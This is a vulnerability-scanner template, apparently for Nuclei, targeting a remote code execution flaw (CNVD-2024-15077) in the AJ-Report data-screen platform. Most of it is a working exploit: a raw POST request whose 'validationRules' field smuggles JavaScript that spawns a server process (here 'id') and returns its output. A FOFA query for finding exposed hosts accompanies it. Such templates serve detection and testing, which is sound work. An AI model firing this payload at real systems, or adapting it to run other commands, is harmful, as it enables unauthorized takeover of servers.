id: CNVD-2024-15077 info: name: AJ-Report Open Source Data Screen - Remote Code Execution author: pussycat0x severity: high description: | AJ Report The platform can execute commands in the corresponding value of the validationRules parameter through post method, obtain server permissions, and log in to the management background to take over the large screen. If it is used by lawless elements to write reactionary slogans, the harmful consequences will be very serious. reference: - https://github.com/wy876/POC/blob/main/AJ-Report%E5%BC%80%E6%BA%90%E6%95%B0%E6%8D%AE%E5%A4%A7%E5%B1%8F%E5%AD%98%E5%9C%A8%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md - https://github.com/vulhub/vulhub/blob/master/aj-report/CNVD-2024-15077/README.md metadata: verified: true max-request: 1 fofa-query: title="AJ-Report" tags: cnvd,cnvd2024,aj-report,rce http: - raw: - | POST /dataSetParam/verification;swagger-ui/ HTTP/1.1 Host: {{Hostname}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Content-Type: application/json;charset=UTF-8 {"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"} matchers-condition: and matchers: - type: word part: body words: - "code" - "data" condition: and - type: regex part: body regex: - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)" - type: status status: - 200 # digest: 4a0a00473045022100a0ad6d10ef5ed64fff1a44a4efb42b8c18de347907d77e68fec2a9f796030e8c022003c9c9bcfc6d56d3a3c7988f48874841753487e2ce57d91740ffbe99e3627448:922c64590222798bb761d5b6d8e72950